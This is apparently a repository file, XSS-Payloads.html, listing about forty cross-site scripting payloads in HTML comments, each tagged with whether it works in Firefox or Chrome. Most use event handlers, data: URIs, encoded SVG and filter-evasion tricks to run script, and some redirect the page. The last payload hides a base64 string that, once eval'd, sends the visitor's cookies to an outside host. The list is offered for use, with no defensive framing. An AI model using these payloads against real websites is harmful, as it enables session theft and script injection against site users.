-
Notifications
You must be signed in to change notification settings - Fork 0
/
XSS-Payloads.html
143 lines (98 loc) · 5.51 KB
/
XSS-Payloads.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
<html>
<head><title>XSS-Payloads</title>
<body>
<!--
Some XSS-Payloads
-->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <svg/onload=alert(1)> -->
<!-- Firefox (+)/ Chrome (+)-->
<!--<a onmouseover=alert(1)>x</a> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <div onmouseover='alert(1)'>DIV</div> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMAGE/onerror=alert(String.fromCharCode(88,83,83)) src=x> -->
<!-- Firefox (-)/ Chrome (+)-->
<!-- <IMAGE/onerror=alert(String.fromCharCode(88,83,83)) src=> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG SRC=# onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG SRC=/ onerror=alert(String.fromCharCode(88,83,83))></img> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <img src=x onerror="javascript:alert('XSS')"> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <ImG sRc = / onerrOr = alert(1)> -->
<!-- <iMaGE sRc = / onerrOr = alert(1)> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <<SvG onloaD= alert(1)//>> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <svg/onmouseover=window.location=`http://google.de` width=1600 height=1600> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG/SRC=#	 onerror=alert(1);	> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <<SCRIPT>alert("XSS");//<</SCRIPT> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <BODY ONLOAD=alert(1)> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <IFRAME SRC=# onmouseover=alert(1)></IFRAME> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <IFRAME SRC=# onerror=alert(1)></IFRAME> -->
<!-- Firefox (-)/ Chrome (+) -->
<!-- <IFRAME SRC=# onload=alert(1)></IFRAME> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="alert(1)"> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <var style="position:absolute;top:0;left:0;width:100%;height:100%" onmousemove=alert(1)></var> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <script src="data:text/javascript,alert(1)"></script> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <iframe/src \/\/onload = alert(1) -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- http://www.<script>alert(1)</script .com -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a style="position:absolute;width:100%;height:100%" onmousemove="this.click();" href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <svg><script>//
alert(1);</script </svg> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <script x> alert(1) </script 1=2 -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+></object> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <audio src=1 href=1 onerror="alert(1)"></audio> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <audio src=1 onerror=alert(1)></audio> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <video src=1 onerror=alert(1)></video> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <video/src ='1'onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <video><source onerror="alert(1)"> -->
<!-- <video><source onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <form><button style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover=this.click() formaction=javascript:alert(1)>x -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a style="position:absolute;width:100%;height:100%" onmousemove="this.click();"  href=[�]"� onmouseover=alert(1)//">XYZ</a -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <plaintext style=position:absolute;width:100%;height:100% onmouseover=alert(1) -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <object data=javascript:alert(1)> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <isindex type=image src=# onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <isindex style=position:absolute;top:0;left:0;width:100%;height:100% onmouseover=this.click() action=javascript:alert(1) type=image> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <img src=x:window.location=alt onerror=eval(src) alt=http://google.de> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a style=position:absolute;width:100%;height:100% onmouseover=alert(1)>x</
<!-- Firefox (+)/ Chrome (+) -->
<!-- <isindex id=d2luZG93LmxvY2F0aW9uPSdodHRwOi8vZnNvYzFldHkuZXN5LmVzL2luZGV4LnBocC8nK2RvY3VtZW50LmNvb2tpZQoK type=image autofocus onfocus=eval(atob(unescape(this.id)))> -->
</body>
</html>